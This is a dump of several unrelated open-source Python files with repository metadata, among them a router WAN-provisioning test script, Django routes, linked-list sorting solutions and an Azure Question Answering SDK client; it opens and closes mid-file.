dict_wanpppconnection2 = {'Enable':[1, '1'],
'ConnectionType':[1, 'IP_Routed'],
'Name':[0, 'Null'],
'Username':[1, Username2],
'Password':[1, Password2],
'X_CT-COM_LanInterface':[1, LAN2+','+WLAN2],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
# 第三条WAN的 WANDSLLinkConfig节点参数
if PVC_OR_VLAN3 == "":
PVC_OR_VLAN3_flag = 0
else:
PVC_OR_VLAN3_flag = 1
dict_wanlinkconfig3 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN3_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN3_flag, PVC_OR_VLAN3]}
# 第三条WAN的WANPPPConnection节点参数
dict_wanpppconnection3 = {'Enable':[1, '1'],
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, LAN3+','+WLAN3],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
# 第四条WAN的 WANDSLLinkConfig节点参数
if PVC_OR_VLAN4 == "":
PVC_OR_VLAN4_flag = 0
else:
PVC_OR_VLAN4_flag = 1
dict_wanlinkconfig4 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN4_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN4_flag, PVC_OR_VLAN4]}
# 第四条WAN的WANPPPConnection节点参数
dict_wanpppconnection4 = {'Enable':[1, '1'],
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, LAN4+','+WLAN4],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
# 第一条PPPoE WAN连接开通
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE',
PVC_OR_VLAN1, dict_wanlinkconfig1,
dict_wanpppconnection1,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 第二条PPPoE WAN连接开通
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE',
PVC_OR_VLAN2, dict_wanlinkconfig2,
dict_wanpppconnection2,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 第三条PPPoE_Bridged WAN连接开通
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE_Bridged',
PVC_OR_VLAN3, dict_wanlinkconfig3,
dict_wanpppconnection3,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 第四条PPPoE_Bridged WAN连接开通
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE_Bridged',
PVC_OR_VLAN4, dict_wanlinkconfig4,
dict_wanpppconnection4,
dict_wanipconnection={},
change_account=1,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
if __name__ == '__main__':
log_dir = g_prj_dir
log.start(name="nwf", directory=log_dir, level="DebugWarn")
log.set_file_id(testcase_name="tr069")
obj = MsgWorklistExecute(id_="1")
obj.sn = "2013012901"
dict_data= {"WEPKeyIndex":("1","1"),"WEPEncryptionLevel":("40-bit","2"),
"WEPKey":("0123456789","3"),
"PVC_OR_VLAN1":("71","4"),"Username1":("TW71","5"),
"Password1":("TW71","6"),
"PVC_OR_VLAN2":("72","7"),"Username2":("TW72","8"),
"Password2":("TW72","9"), "PVC_OR_VLAN3":("73","10"),
"PVC_OR_VLAN4":("74","11"),"WANEnable_Switch":("1","12")}
obj.dict_data = dict_data
try:
ret = test_script(obj)
if ret == ERR_SUCCESS:
print u"测试成功"
else:
print u"测试失败"
print "****************************************"
print obj.dict_ret["str_result"]
except Exception, e:
print u"测试异常"
| [
"[email protected]"
] | |
1b33a0d2e211750824ab74b353f3eec8b0a32f06 | 6e2dfbf50c1def19cd6ae8e536a2ddb954a5ad63 | /predict.py | 3e96f112a8763f74066d46caa470404c48356c44 | [
"BSD-3-Clause",
"LGPL-2.1-or-later",
"MIT",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | boshining/NeuronBlocks | 9d71f087772eb17c3a4130d0374818cfd80d976f | 74fbb8658fb3f1cffea5c9bc84b2a1da59c20dd9 | refs/heads/master | 2020-05-27T16:24:10.244042 | 2019-08-06T07:37:55 | 2019-08-06T07:37:55 | 188,699,703 | 0 | 0 | MIT | 2019-08-06T08:19:55 | 2019-05-26T15:23:06 | Python | UTF-8 | Python | false | false | 3,096 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from settings import ProblemTypes, version
import os
import argparse
import logging
from ModelConf import ModelConf
from problem import Problem
from LearningMachine import LearningMachine
def main(params):
conf = ModelConf('predict', params.conf_path, version, params, mode=params.mode)
problem = Problem('predict', conf.problem_type, conf.input_types, None,
with_bos_eos=conf.add_start_end_for_seq, tagging_scheme=conf.tagging_scheme, tokenizer=conf.tokenizer,
remove_stopwords=conf.remove_stopwords, DBC2SBC=conf.DBC2SBC, unicode_fix=conf.unicode_fix)
if os.path.isfile(conf.saved_problem_path):
problem.load_problem(conf.saved_problem_path)
logging.info("Problem loaded!")
logging.debug("Problem loaded from %s" % conf.saved_problem_path)
else:
raise Exception("Problem does not exist!")
if len(conf.predict_fields_post_check) > 0:
for field_to_chk in conf.predict_fields_post_check:
field, target = field_to_chk.split('@')
if not problem.output_dict.has_cell(target):
raise Exception("The target %s of %s does not exist in the training data." % (target, field_to_chk))
lm = LearningMachine('predict', conf, problem, vocab_info=None, initialize=False, use_gpu=conf.use_gpu)
lm.load_model(conf.previous_model_path)
logging.info('Predicting %s with the model saved at %s' % (conf.predict_data_path, conf.previous_model_path))
lm.predict(conf.predict_data_path, conf.predict_output_path, conf.predict_file_columns, conf.predict_fields)
logging.info("Predict done! The predict result: %s" % conf.predict_output_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Prediction')
parser.add_argument("--conf_path", type=str, help="configuration path")
parser.add_argument("--predict_data_path", type=str, help='specify another predict data path, instead of the one defined in configuration file')
parser.add_argument("--previous_model_path", type=str, help='load model trained previously.')
parser.add_argument("--predict_output_path", type=str, help='specify another prediction output path, instead of conf[outputs][save_base_dir] + conf[outputs][predict_output_name] defined in configuration file')
parser.add_argument("--log_dir", type=str)
parser.add_argument("--batch_size", type=int, help='batch_size of each gpu')
parser.add_argument("--mode", type=str, default='normal', help='normal|philly')
parser.add_argument("--force", type=bool, default=False, help='Allow overwriting if some files or directories already exist.')
parser.add_argument("--disable_log_file", type=bool, default=False, help='If True, disable log file')
parser.add_argument("--debug", type=bool, default=False)
params, _ = parser.parse_known_args()
assert params.conf_path, 'Please specify a configuration path via --conf_path'
if params.debug is True:
import debugger
main(params) | [
"[email protected]"
] | |
c6ddac9e303b762b38d565c374ec231de78f1052 | aac63f0f178945e8109f74ebb9bbb59165185172 | /news/urls.py | e0d7f3b27f0854cb4fa0912eb93b73f36dddd8c4 | [] | no_license | okumujustine/hacker-news-clone | 587f7e88f53d576ee58e5dfff78f4d18e046b4db | 7f70d18325c7627237de719e04bdde9ad75a8d5d | refs/heads/main | 2023-01-02T13:41:37.825072 | 2020-11-04T14:52:41 | 2020-11-04T14:52:41 | 310,032,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py |
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
from apps.core.views import signup
from apps.story.views import frontpage, search, submit, newest, vote, story
urlpatterns = [
path('', frontpage, name='frontpage'),
path('s/<int:story_id>/vote/', vote, name='vote'),
path('s/<int:story_id>/', story, name='story'),
path('u/', include('apps.userprofile.urls')),
path('newest/', newest, name='newest'),
path('search/', search, name='search'),
path('submit/', submit, name='submit'),
path('signup/', signup, name='signup'),
path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),
path('logout/', views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
fc6b3d226bbf27414b9873a6166718c97218c228 | 16fcf452e6165a0de5bc540c57b6e6b82d822bb1 | /Learntek_code/4_June_18/while2.py | 7a9891325874d47ce4779e35a821980c21e374a2 | [] | no_license | mohitraj/mohitcs | e794e9ad2eb536e3b8e385fb8d222e8ade95c802 | d6399b2acf69f5667c74f69715a0b55060bf19d1 | refs/heads/master | 2021-09-09T00:21:23.099224 | 2021-09-07T16:39:07 | 2021-09-07T16:39:07 | 87,798,669 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | import getpass
print "Hello World "
print "Please enter the password\t"
pass1 = getpass.getpass()
flag1 =0
num =0
while True:
if pass1=="India":
print "Welcome in India"
break
else :
print "Wrong password type again"
num = num+1
print num
if num==3:
break
print "Please enter the password again\t"
pass1 = getpass.getpass() | [
"[email protected]"
] | |
525379ed03b39dc09421131f1b21c85a278b744d | ab1f25e6266a71ea23f1d3e04ec8635ae550d1df | /HW6/Task-1/temp_HW6/person.py | 9dc7cb45a9f296a612d9c858867a544884bb3914 | [] | no_license | Pavlenkovv/e-commerce | 5143d897cf779007181a7a7b85a41acf3dfc02c4 | 0d04d7dfe3353716db4d9c2ac55b0c9ba54daf47 | refs/heads/master | 2023-01-25T03:13:41.238258 | 2020-12-06T22:16:53 | 2020-12-06T22:16:53 | 313,103,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | class Person:
"""Any Person"""
def __init__(self, surname=None, name=None, age=None, *args, **kwargs):
self.surname = surname
self.name = name
self.age = age
def __str__(self):
return f'Surname: {self.surname}, name: {self.name}, age: {self.age}'
| [
"[email protected]"
] | |
1dee9eaec67b0c0952431a177322b33833f669d8 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/detection/GCNet/dependency/mmdet/models/detectors/point_rend.py | e9d1d4b639d2027b566b58ab2b44017d39b48e54 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 1,366 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..builder import DETECTORS
from .two_stage import TwoStageDetector
@DETECTORS.register_module()
class PointRend(TwoStageDetector):
"""PointRend: Image Segmentation as Rendering
This detector is the implementation of
`PointRend <https://arxiv.org/abs/1912.08193>`_.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(PointRend, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
| [
"[email protected]"
] | |
1f67fe7255fb1282c3fcc2652a59677474c9bda8 | 784936ad8234b5c3c20311ce499551ee02a08879 | /lab4/patterns/pattern04.py | 3fcf0f3989546c699ae05960faf3d52c1bb8cec2 | [] | no_license | jonlin97/CPE101 | 100ba6e5030364d4045f37e317aa05fd6a06cb08 | 985d64497a9861f59ab7473322b9089bfa57fd10 | refs/heads/master | 2021-06-16T01:31:31.025153 | 2017-02-28T19:29:11 | 2017-02-28T19:29:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | import driver
def letter(row, col):
if row in [2,3,4] and col in [3,4,5,6]:
return 'M'
else:
return 'S'
if __name__ == '__main__':
driver.comparePatterns(letter)
| [
"[email protected]"
] | |
1ca12f40b6da6c54896751b8fdc0c2ed2ce7ded5 | d2fb1de19bb55e3b03db94b4fdce396fe56a223e | /caesure/ecdsa_secp256k1.py | a24f78a2d48632ae1799cf42702c8927e03412a2 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | mikegogulski/caesure | 83a2a0a5d9b7c16339d54076bc54d351dbe0c3e4 | ccee420665e3fb4e7a005241efc6832ead4b90d8 | refs/heads/master | 2021-01-22T00:02:40.058902 | 2014-11-04T05:54:25 | 2014-11-04T05:54:25 | 26,273,215 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # -*- Mode: Python -*-
import caesure.secp256k1
from bitcoin import dhash
class KEY:
def __init__ (self):
self.p = None
def set_pubkey (self, key):
self.p = key
def verify (self, data, sig):
return caesure.secp256k1.verify (self.p, dhash (data), sig)
| [
"[email protected]"
] | |
d99ff535dc1910cb9019d6f11a9939d50cc55669 | acb7228022a36218846bc3f431e7a45057bb581d | /mappingpedia/migrations/0003_auto_20180214_1501.py | 9c5d9d620a594b0c3db4110b7ac1bfa980b4358a | [
"Apache-2.0"
] | permissive | oeg-upm/mappingpedia-userinterface | c6ba106f3072a4d37c1c34573e2d72882429dd1b | 1738b32f704bbf66f1ed8b78c99c71d49b208d43 | refs/heads/master | 2021-11-03T14:34:39.044575 | 2019-04-26T07:02:11 | 2019-04-26T07:02:11 | 111,107,643 | 3 | 1 | Apache-2.0 | 2018-02-28T11:55:04 | 2017-11-17T13:40:44 | HTML | UTF-8 | Python | false | false | 692 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-02-14 15:01
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mappingpedia', '0002_auto_20180214_1409'),
]
operations = [
migrations.RenameField(
model_name='executionprogress',
old_name='result_page',
new_name='result_url',
),
migrations.AlterField(
model_name='executionprogress',
name='timestamp',
field=models.DateTimeField(default=datetime.datetime(2018, 2, 14, 15, 0, 54, 799127)),
),
]
| [
"[email protected]"
] | |
f1da8b2e8cd2b49b4089ef7c8d1561bd7405bb9c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/380/usersdata/348/85739/submittedfiles/testes.py | 6041d85fcddfaab01edb49cb3b652c18ffee68af | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | b = 0
a = 100
for i in range(0,a,1):
if (a%(i+1)) !=0:
b = b + 1
print(b)
| [
"[email protected]"
] | |
ea35143cdc0111cd7637ce9c09e8694f82c80c7d | 3d91c09bca4e68bf7a527cb40ed70ac208495b93 | /library/migrations/0004_auto_20201128_0844.py | faa172d3cb83cc52c23cfb2b00723338c7b633e8 | [] | no_license | Kaik-a/OCR-Projet13 | 02e9d8c9228d6d7a09013b4ab2570304c01dfc28 | ac339002279397f43316e33a869cce797b5d92b2 | refs/heads/main | 2023-02-17T09:39:11.184120 | 2021-01-11T15:50:58 | 2021-01-11T15:50:58 | 311,875,691 | 0 | 0 | null | 2021-01-11T15:50:59 | 2020-11-11T05:51:34 | CSS | UTF-8 | Python | false | false | 368 | py | # Generated by Django 3.1.3 on 2020-11-28 08:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("library", "0003_auto_20201128_0823"),
]
operations = [
migrations.AlterUniqueTogether(
name="lendedgame",
unique_together={("owned_game", "return_date")},
),
]
| [
"[email protected]"
] | |
7f271a553860b8386270632196e05e93106e5631 | 5cbf6cf8a9eb958391c371c6181c49155533b6ba | /leetcode_链表_18.排序链表(快排+归并).py | 4825959173e4f80a6369e29f6246967d3a75fdf9 | [] | no_license | cmychina/Leetcode | dec17e6e5eb25fad138a24deba1d2f087db416f7 | 18e6ac79573b3f535ca5e3eaa477eac0e60bf510 | refs/heads/master | 2022-12-20T16:09:46.709808 | 2020-09-28T04:04:54 | 2020-09-28T04:04:54 | 282,446,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,223 | py | """
链表的快排与归并排序
"""
from linklist import *
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
归并排序,要找中点,链表中点用快慢指针
:param head:
:return:
"""
if not head or not head.next:
return head
slow,fast=head,head
while fast.next and fast.next.next:
slow=slow.next
fast=fast.next.next
right=self.sortList(slow.next)
slow.next=None#切断
left=self.sortList(head)
return self.mergesort(left,right)
def mergesort(self,head1,head2):
ans=ListNode(-1)
pre=ans
while head1 and head2:
if head1.val<=head2.val:
pre.next=head1
head1=head1.next
pre=pre.next
else:
pre.next=head2
head2=head2.next
pre=pre.next
if head1:
pre.next=head1
if head2:
pre.next=head2
return ans.next
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
快排
:param head:
:return:
"""
if not head or not head.next:
return head
ans = ListNode(-1)
ans.next = head
return self.quicksort(ans, None)
def quicksort(self, head, end):
if head == end or head.next == end or head.next.next == end:
return head
tmp = ListNode(-1)
partition = head.next
p = partition
#用来记录排序结果?
t = tmp
while p.next!=end:
if p.next.val < partition.val:
t.next = p.next
t = t.next
p.next = p.next.next
#大于partitio的val,不操作
else:
p = p.next
t.next = head.next#head.next 是未排序前
head.next = tmp.next
self.quicksort(head, partition)
self.quicksort(partition, end)
return head.next
if __name__=="__main__":
a=[4,5,3,6,1,7,8,2]
l1=convert.list2link(a)
s=Solution()
out=s.sortList(l1)
print(convert.link2list(out))
| [
"[email protected]"
] | |
b277f0d27a1a1bc16d0c56b6ca8d5a27cbcb6c93 | 974c5a4f101d0e6f4dfa5fc2f7c641c9d2bd8184 | /sdk/cognitivelanguage/azure-ai-language-questionanswering/azure/ai/language/questionanswering/authoring/aio/_operations/_operations.py | 0e46617f5d1c327c085652d1db7dc3c6ae718e0c | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | gaoyp830/azure-sdk-for-python | 4816f04c554dcffb7510a6b7044b0c86a2dd32e1 | 1c66defa502b754abcc9e5afa444ca03c609342f | refs/heads/master | 2022-10-20T21:33:44.281041 | 2022-09-29T17:03:13 | 2022-09-29T17:03:13 | 250,355,505 | 0 | 0 | MIT | 2020-03-26T19:42:13 | 2020-03-26T19:42:12 | null | UTF-8 | Python | false | false | 153,782 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from urllib.parse import parse_qs, urljoin, urlparse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from ..._operations._operations import (
build_add_feedback_request,
build_create_project_request,
build_delete_project_request,
build_deploy_project_request,
build_export_request,
build_get_project_details_request,
build_import_assets_request,
build_list_deployments_request,
build_list_projects_request,
build_list_qnas_request,
build_list_sources_request,
build_list_synonyms_request,
build_update_qnas_request,
build_update_sources_request,
build_update_synonyms_request,
)
from .._vendor import MixinABC
if sys.version_info >= (3, 9):
from collections.abc import MutableMapping
else:
from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports
JSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class QuestionAnsweringAuthoringClientOperationsMixin(MixinABC): # pylint: disable=too-many-public-methods
@distributed_trace
def list_projects(
self, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all projects for a user.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/list-projects
for more information.
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_projects_request(
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
@distributed_trace_async
async def get_project_details(self, project_name: str, **kwargs: Any) -> JSON:
"""Get the requested project metadata.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-project-details
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
request = build_get_project_details_request(
project_name=project_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, cast(JSON, deserialized), {})
return cast(JSON, deserialized)
@overload
async def create_project(
self, project_name: str, options: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Parameters needed to create the project. Required.
:type options: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
options = {
"language": "str", # Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default. Required.
"description": "str", # Optional. Description of the project.
"multilingualResource": bool, # Optional. Set to true to enable creating
knowledgebases in different languages for the same resource.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
@overload
async def create_project(
self, project_name: str, options: IO, *, content_type: str = "application/json", **kwargs: Any
) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Parameters needed to create the project. Required.
:type options: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: JSON object
:rtype: JSON
